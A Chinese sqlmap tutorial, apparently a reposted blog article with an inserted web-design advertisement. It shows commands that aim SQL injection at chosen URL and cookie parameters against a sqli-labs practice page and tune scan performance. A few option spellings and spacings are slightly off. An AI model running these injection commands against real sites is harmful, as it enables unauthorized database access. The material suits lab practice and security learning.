注入工具sqlmap如何指定位置注入和优化性能,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。
创新互联服务项目包括灵武网站建设、灵武网站制作、灵武网页制作以及灵武网络营销策划等。多年来,我们专注于互联网行业,利用自身积累的技术优势、行业经验、深度合作伙伴关系等,向广大中小型企业、政府机构等提供互联网行业的解决方案,灵武网站推广取得了明显的社会效益与经济效益。目前,我们服务的客户以成都为中心已经辐射到灵武省份的部分城市,未来相信会继续扩大服务区域并继续获得客户的支持与信任!
一、指定位置注入
1、-p,指定具体探测的参数
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1 -p id --dbs 对id进行探测
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 -p “id,name” --dbs 对id和name都进行探测
2、–skip,忽略探测的参数
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --level 5 --skip host --dbs 5级对所有存在的注入点进行探测,这里忽略了host
3、–param-exclude,忽略包含具体内容的参数
–param-exclude=“id|name”
4、–skip-static 忽略非动态参数
5、用“*”指定注入位置,
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1*&&name=2*&&tab=3 --dbs
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie=“un=adm*;pw=adm”–dbs
sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie="*"–dbs
二、优化性能
1、设置连接为持久连接
http报文中设置Connection:Keep-Alive
sqlmap中加参数 --keep-alive
2、设置不接受http当中的body,常用在盲注
–null-connection
3、设置多线程
–thread 默认是1个线程,最大线程为10
4、预测输出
–predict-output,不能与thread同时用
5、开启所有优化
-o
看完上述内容,你们掌握注入工具sqlmap如何指定位置注入和优化性能的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注创新互联行业资讯频道,感谢各位的阅读!